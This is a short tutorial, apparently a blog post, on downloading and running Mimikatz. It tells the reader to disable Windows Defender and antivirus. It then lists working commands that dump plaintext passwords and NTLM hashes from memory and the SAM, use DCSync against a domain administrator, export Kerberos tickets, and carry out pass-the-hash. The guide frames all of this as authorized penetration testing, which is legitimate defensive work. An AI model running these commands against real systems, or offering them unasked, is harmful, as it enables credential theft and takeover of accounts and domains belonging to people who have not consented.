Introduction

Mimikatz is a powerful post-exploitation tool designed to extract plaintext passwords, hashes, PIN codes, and Kerberos tickets from memory. It is widely used by penetration testers and security professionals to assess system vulnerabilities. This guide provides a step-by-step approach to installing and using Mimikatz for ethical security testing.

Warning: Unauthorized use of Mimikatz is illegal. Ensure you have permission before using it in any environment.

Prerequisites

Before installing Mimikatz, make sure you have the following:

  • A Windows machine (Windows 7, 10, 11, or Server versions)
  • Administrative privileges
  • Windows Defender and any antivirus software disabled (Mimikatz is often flagged as malware)

Downloading Mimikatz

Mimikatz is an open-source tool available on GitHub. To download it:

  1. Open a web browser and go to https://github.com/gentilkiwi/mimikatz.
  2. Click on Code > Download ZIP.
  3. Extract the ZIP file to a folder of your choice.

Alternatively, you can clone the repository using Git:

 git clone https://github.com/gentilkiwi/mimikatz.git

Running Mimikatz

Since Mimikatz requires administrative privileges, follow these steps to run it:

  1. Open Command Prompt or PowerShell as Administrator.
  2. Navigate to the folder where you extracted Mimikatz:
    cd path\to\mimikatz\x64
  3. Run Mimikatz:
    mimikatz.exe
  4. You should see a command-line interface with the mimikatz # prompt.

Basic Mimikatz Commands

1. Check System Privileges

Before extracting credentials, verify that you have sufficient privileges:

privilege::debug

If successful, you should see: Privilege '20' OK

2. Extracting Passwords from Memory

To dump plaintext passwords from memory, use:

sekurlsa::logonpasswords

This will display username, domain, and passwords in plaintext if available.

3. Dumping NTLM Hashes

NTLM hashes can be used for pass-the-hash attacks. To extract them, run:

lsadump::sam

Or, for remote systems:

lsadump::dcsync /domain:targetdomain.com /user:Administrator

4. Kerberos Ticket Extraction

To retrieve Kerberos tickets from the system:

sekurlsa::tickets /export

This exports .kirbi files, which can be used in pass-the-ticket attacks.

5. Pass-the-Hash Attack

To authenticate with an NTLM hash instead of a password:

sekurlsa::pth /user:Administrator /domain:example.com /ntlm:<hash>